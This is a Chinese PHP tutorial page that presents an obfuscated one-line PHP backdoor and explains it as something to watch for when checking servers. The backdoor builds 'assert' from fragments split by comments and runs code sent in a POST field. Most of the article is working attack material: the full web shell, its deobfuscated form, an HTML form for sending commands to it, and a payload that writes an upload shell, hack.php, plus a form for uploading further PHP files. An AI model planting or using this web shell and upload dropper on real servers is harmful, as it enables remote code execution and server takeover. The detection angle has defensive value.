微信公众号 讲师中心
首页
文章
后端开发 web前端 数据库 开发工具 php框架 常见问题 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 自媒体 新闻
专题
后端开发 web前端 数据库 开发工具 php框架 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 新闻
AI工具
AI 聊天问答 Agent智能体 AI 文本写作 AI 绘画作图 AI 设计工具 AI 视频创作 AI 音频制作 AI 办公学习 AI 编程开发 Prompt指令
学习
大前端 后端开发 数据库 移动端 运维开发 计算机基础
编程手册
大前端 后端开发 数据库 移动端 运维开发 计算机基础
下载
js特效 网站源码 工具下载 类库下载 网站素材 学习资源 插件扩展 手机/移动开发 手机游戏
最近更新
搜索
后端开发 web前端 数据库 开发工具 php框架 常见问题 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程
自媒体 新闻
首页 > 后端开发 > php教程 > 正文

代码简短且隐蔽的后门木马

php中文网
发布: 2016-07-30 13:29:59
原创
1761人浏览过

本文将介绍一个代码很简短,而且很隐蔽后门木马,以便让大家在检测程序时可以避免被挂木马。

文件内容如下:

<code><?php
@<span>$_</span>=<span>"s"</span>.<span>"s"</span>./*-<span>/*-*/</span><span>"e"</span>./*-<span>/*-*/</span><span>"r"</span>;
@<span>$_</span>=<span>/*-/</span>*-*<span>/"a"./</span>*-<span>/*-*/</span><span>$_</span>./*-<span>/*-*/</span><span>"t"</span>;
@<span>$_</span>/*-<span>/*-*/</span>(<span>$/</span>*-<span>/*-*/</span>{<span>"_P"</span>./*-<span>/*-*/</span><span>"OS"</span>./*-<span>/*-*/</span><span>"T"</span>}
[<span>/*-/</span>*-*<span>/0/</span>*-<span>/*-*/</span>-<span>/*-/</span>*-*<span>/2/</span>*-<span>/*-*/</span>-<span>/*-/</span>*-*<span>/5/</span>*-<span>/*-*/</span>]);?></code>
登录后复制

代码中插入了很多注释符,服务器的检测程序如果不严谨很难检测到。

把注释符删除后,代码如下:

<code><span><span><?php</span>
@<span>$_</span>=<span>"s"</span>.<span>"s"</span>.<span>"e"</span>.<span>"r"</span>;
@<span>$_</span>=<span>"a"</span>.<span>$_</span>.<span>"t"</span>;
@<span>$_</span>(${<span>"_P"</span>.<span>"OS"</span>.<span>"T"</span>}
[<span>0</span>-<span>2</span>-<span>5</span>]);
<span>?></span></span></code>
登录后复制

最后实际执行的代码内容为:

<code><span><span><?php</span>
assert(${<span>"_POST"</span>}[-<span>7</span>]);
<span>?></span></span></code>
登录后复制

原来这个后门是利用了php assert方法来执行程序。 

<code><span>bool</span><span>assert</span> ( mixed $assertion [, <span>string</span> $description ] )
</code>
登录后复制

assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适当的行动。

Boomy
Boomy

AI音乐生成工具,创建生成音乐,与世界分享.

Boomy 272
查看详情 Boomy

如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。

如果$assertion的内容为phpinfo(); 则会把服务器的信息返回,使攻击者能获取到服务器信息对此攻击。

上传了这个后门程序后,攻击者只需要创建一个简单的html就可以在服务器中执行php语句。
假设后门文件是backdoor.php

<code><span><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"></span><span><<span>html</span>></span><span><<span>head</span>></span><span><<span>title</span>></span> back door <span></<span>title</span>></span><span></<span>head</span>></span><span><<span>body</span>></span><span><<span>form</span><span>name</span>=<span>"form1"</span><span>method</span>=<span>"post"</span><span>action</span>=<span>"http://www.example.com/backdoor.php"</span>></span><span><<span>p</span>></span><span><<span>textarea</span><span>name</span>=<span>"-7"</span><span>style</span>=<span>"width:500px; height:300px"</span>></span><span></<span>textarea</span>></span><span></<span>p</span>></span><span><<span>p</span>></span><span><<span>input</span><span>type</span>=<span>"submit"</span><span>value</span>=<span>"submit"</span>></span><span></<span>p</span>></span><span></<span>form</span>></span><span></<span>body</span>></span><span></<span>html</span>></span></code>
登录后复制


攻击方式:
1.获取服务器信息可输入

<code><span>phpinfo()</span>;</code>
登录后复制

2.创建一个可随便上传文件的php可输入

<code>file_put_contents(<span>'hack.php'</span>, <span>'<?php move_uploaded_file($_FILES[\'</span>name\<span>'][\'</span>tmp_name\<span>'], dirname(__FILE__).\'</span>/dest.php\<span>');?>'</span> ,<span>true</span>);</code>
登录后复制

然后创建一个上传文件的html调用hack.php

<code><span><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"></span><span><<span>html</span>></span><span><<span>head</span>></span><span><<span>title</span>></span> upload <span></<span>title</span>></span><span></<span>head</span>></span><span><<span>body</span>></span><span><<span>form</span><span>name</span>=<span>"form1"</span><span>method</span>=<span>"post"</span><span>action</span>=<span>"http://www.example.com/hack.php"</span><span>enctype</span>=<span>"multipart/form-data"</span>></span><span><<span>p</span>></span><span><<span>input</span><span>type</span>=<span>"file"</span><span>name</span>=<span>"name"</span>></span><span></<span>p</span>></span><span><<span>p</span>></span><span><<span>input</span><span>type</span>=<span>"submit"</span><span>value</span>=<span>"submit"</span>></span><span></<span>p</span>></span><span></<span>form</span>></span><span></<span>body</span>></span><span></<span>html</span>></span></code>
登录后复制

之后便可随意上传php文件执行了。

版权声明:本文为博主原创文章,未经博主允许不得转载。

以上就介绍了代码简短且隐蔽的后门木马,包括了方面的内容,希望对PHP教程有兴趣的朋友有所帮助。

相关标签:
html php

大家都在看:

最佳 Windows 性能的顶级免费优化软件
最佳 Windows 性能的顶级免费优化软件

每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。

下载
来源:php中文网
收藏 点赞
上一篇:架构设计:负载均衡层设计方案(8)——负载均衡层总结上篇 下一篇:php:关于变量,类型,作用域
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
WordPress AJAX 400错误:解决非登录用户请求失败的通用方案 本文旨在解决WordPress中AJAX请求对非登录用户返回400"BadRequest"错误的问题。核心原因在于WordPress的wp_ajax_{$action}钩子仅对已登录用户生效。教程将详细阐述如何通过同时使用wp_ajax_{$action}和wp_ajax_nopriv_{$action}钩子,确保AJAX功能在所有用户状态下(包括已登录和未登录)均能正常运行,并提供示例代码和最佳实践。
2025-11-21 11:07:11
224
使用正则表达式实现高级密码验证:兼顾字符类型与特定字符排除 本文详细介绍了如何利用正则表达式构建一个强大的密码验证机制。教程涵盖了设置密码长度、强制包含大写字母、小写字母、数字和特殊字符的规则,并着重讲解了如何通过负向先行断言(NegativeLookahead)巧妙地排除特定字符,如点号和下划线,确保密码策略的全面性和安全性。
2025-11-21 11:06:18
522
如何在WooCommerce中通过PHP代码禁用多个产品购买功能 本文将详细介绍如何在WooCommerce中使用PHP的woocommerce_is_purchasable过滤器,实现对特定多个产品ID禁用购买功能。通过示例代码,您将学会如何构建一个产品ID数组,并利用in_array函数高效地控制产品的可购买状态,从而满足如禁止销售某些产品或要求联系商家等业务需求。
2025-11-21 11:06:06
215
WooCommerce:使用PHP批量控制产品可购买性 本教程详细介绍了如何在WooCommerce中使用woocommerce_is_purchasable过滤器,通过PHP代码批量禁用特定产品的购买功能。文章从理解过滤器机制入手,逐步演示如何从单个产品控制扩展到多个产品ID的批量管理,并提供了完整的代码示例、详细解析以及集成部署的注意事项,帮助开发者灵活控制产品销售状态。
2025-11-21 10:59:01
259
WordPress自定义主题:动态控制“查看更多”按钮的显示与隐藏 本教程详细指导如何在WordPress自定义主题中,根据特定文章类型(如新闻)是否存在内容,动态显示或隐藏“查看更多”按钮。通过利用WP_Query类获取文章总数,我们可以精确地控制页面元素的可见性,并在无内容时提供友好的提示信息,从而提升用户体验和网站的交互逻辑。
2025-11-21 10:58:37
740
Laravel路由分组与中间件:处理同一URI下的条件逻辑 本文深入探讨了Laravel中路由分组、中间件执行顺序及路由覆盖机制,特别是当不同中间件的路由组定义了相同URI时的行为。文章分析了为何不能通过路由组顺序实现条件回退,并提供了在同一URI下根据用户状态(如是否订阅)实现不同行为的解决方案,强调了在路由或控制器内部进行条件判断的最佳实践。
2025-11-21 10:56:18
857
Laravel会话认证下前端数据请求的路由策略:web.php的最佳实践 本文探讨了在Laravel应用中,当使用会话(Session)认证且前端通过JavaScript(如Vue/Axios)请求认证用户数据时,路由文件web.php和api.php的选择困境。核心观点是,对于会话认证的用户,应将相关API路由置于web.php,即使返回JSON数据,这并非不良实践。web.php能够无缝利用会话状态和CSRF保护,简化了前端与认证用户的交互,避免了api.php在会话场景下的复杂性。
2025-11-21 10:51:01
865
Symfony与Docker集成:解决数据库连接主机名解析失败 本文探讨Symfony应用在本地运行,而数据库运行在Docker容器中时,因主机名无法解析导致的数据库连接问题。主要解决方案包括修改本地hosts文件映射容器IP,或将Symfony应用也容器化以实现统一网络环境。文章将详细指导如何识别问题并实施两种解决方案,以确保Symfony应用能正确连接到Docker化的PostgreSQL数据库。
2025-11-21 10:49:12
835
PHP中判断字符串是否只包含一个单词的技巧 本文将详细介绍如何在PHP中高效判断一个字符串是否仅由一个单词组成,同时处理各种空格情况。文章将通过trim()和explode()函数组合应用,并探讨边缘情况如空字符串和多个内部空格,最终提供一个健壮的解决方案及Laravel应用场景。
2025-11-21 10:48:45
856
PHP:结合具有重复键的多个数组值 本文详细介绍了在PHP中如何高效地结合包含重复键和多组对应值的两个数组。针对array_combine无法处理重复键并会覆盖旧值的局限性,我们提出了一种利用array_chunk和array_map函数的策略。通过将原始数组分块,然后对每个分块应用array_combine,最终生成一个包含多个独立关联数组的结构,完美解决了重复数据组的合并需求。
2025-11-21 10:45:21
757
相关专题
更多>
热门推荐
开源免费商场系统广告
热门教程
更多>
相关推荐
热门推荐
最新课程
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新 English
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号

  • PHP学习

  • 技术支持

  • 返回顶部